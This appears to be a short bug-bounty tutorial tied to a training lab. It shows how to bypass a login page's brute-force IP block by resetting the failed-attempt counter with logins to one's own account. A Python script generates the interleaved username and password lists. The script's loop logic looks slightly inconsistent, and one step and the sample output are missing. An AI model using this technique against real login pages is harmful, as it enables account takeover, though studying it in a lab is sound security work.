Bypass Brute-force IP Block

In bug bounty, sometimes we are stuck by the target login page when we attempt too many invalid usernames or passwords. Most of the time, the target website blocks our IP or red alerts the message,

“You have made too many incorrect login attempts. Please try again in 1 minute(s).”

This means that our IP has been blocked for 1 minute. We can’t attempt more in this time period. This restriction can’t give the opportunity for brute force attacks. But we can bypass this restriction!

Let’s see:

1. Observe that your IP is temporarily blocked if you submit 3 incorrect logins in a row. However, notice that you can reset the counter for the number of failed login attempts by logging in to your own account before this limit is reached.
2. So make a python payload that every two brute force attempts the correct username and password should be input.

###For this logic lets write a Python script#####
print("The Following are the usernames: #############")
for i in range(150):
   if i%3:
       print("carlos")
   else :
       print("wiener")
print("The following are the passwords: ##########")
with open('password.txt','r') as f:
   lines = f.readlines()

i = 0
for pwd in lines:
   if i%3:
       print(pwd.strip('\n'))
   else:
       print("peter")
       print(pwd.strip('\n'))
       i = i+1
   i = i+1

Note: Save all the passwords in a password.txt file.

The output looks like this:

4. Then we analyze the 302 (redirect home page) of username carlos;

For Practical Demonstration, you can solve this lab

Lab: Broken brute-force protection, IP block

#HappyHacking